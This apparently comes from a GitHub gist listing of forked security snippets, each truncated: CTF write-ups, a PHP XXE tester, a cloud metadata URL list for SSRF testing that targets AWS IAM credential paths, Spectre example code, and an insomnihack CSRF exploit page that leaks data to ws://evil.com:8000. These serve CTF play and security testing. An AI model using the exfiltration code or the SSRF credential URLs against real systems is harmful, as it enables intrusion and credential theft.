0xBADCA7 / solve.py

Created May 15, 2016 20:26 — forked from elliptic-shiho/solve.py

BCTF 2016 steganography 150: midifan Writeup

0xBADCA7 / README.md

Created September 13, 2016 07:42 — forked from stypr/README.md

ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

0xBADCA7 / php_xxe_tester.php

Created April 7, 2017 23:59 — forked from lukaskuzmiak/php_xxe_tester.php

PHP XXE tester

	<?php
	// Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151)
	// The libxml entity loader is disabled by default
	// even setting the libxml_disable_entity_loader to false doesn't works!
	//
	// @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php
	// @see http://stackoverflow.com/a/10213239
	// @see https://stackoverflow.com/questions/24117700

	$dir = __DIR__;

0xBADCA7 / cloud_metadata.txt

Created August 20, 2017 12:32 — forked from BuffaloWill/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

0xBADCA7 / asm.s

Created January 4, 2018 02:09 — forked from dougallj/asm.s

x86-64 Speculative Execution Harness

0xBADCA7 / spectre.c

Created January 4, 2018 14:00 — forked from ErikAugust/spectre.c

Spectre example code

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif

0xBADCA7 / index.html

Created January 26, 2018 07:25 — forked from cgvwzq/index.html

insomnihack'18 - Cool Storage Service web challenge

	<body>
	<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
	// change admin's email
	<input type="text" name="email" value="[email protected]">
	<input type="text" name="csrf" value="">
	<input type="text" name="change" value="Modify profile">
	</form>
	<iframe id="leakchar"></iframe>
	<script>
	const WS = "ws://evil.com:8000";

0xBADCA7 / waybackurls.py

Created February 5, 2018 14:26 — forked from mhmdiaa/waybackurls.py

	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

0xBADCA7 / server.asm

Created May 7, 2018 13:48 — forked from dmfutcher/server.asm

TCP Echo server in x86_64 assembly, using Linux system calls.

	;; Simple TCP echo server in x86_64 assembly, using Linux syscalls
	;;
	;; nasm -felf64 -o server.o server.asm
	;; ld server.o -o server
	;; ./server
	;;

	global _start

	;; Data definitions

0xBADCA7 / entropy.py

Created February 2, 2019 03:09 — forked from xep624/entropy.py

This is a script which counts a character entropy in a single string.

	#!/bin/env python

	import math
	import sys

	'''
	This is a script which counts a character entropy in a single string.

	Usage: entropy.py STRING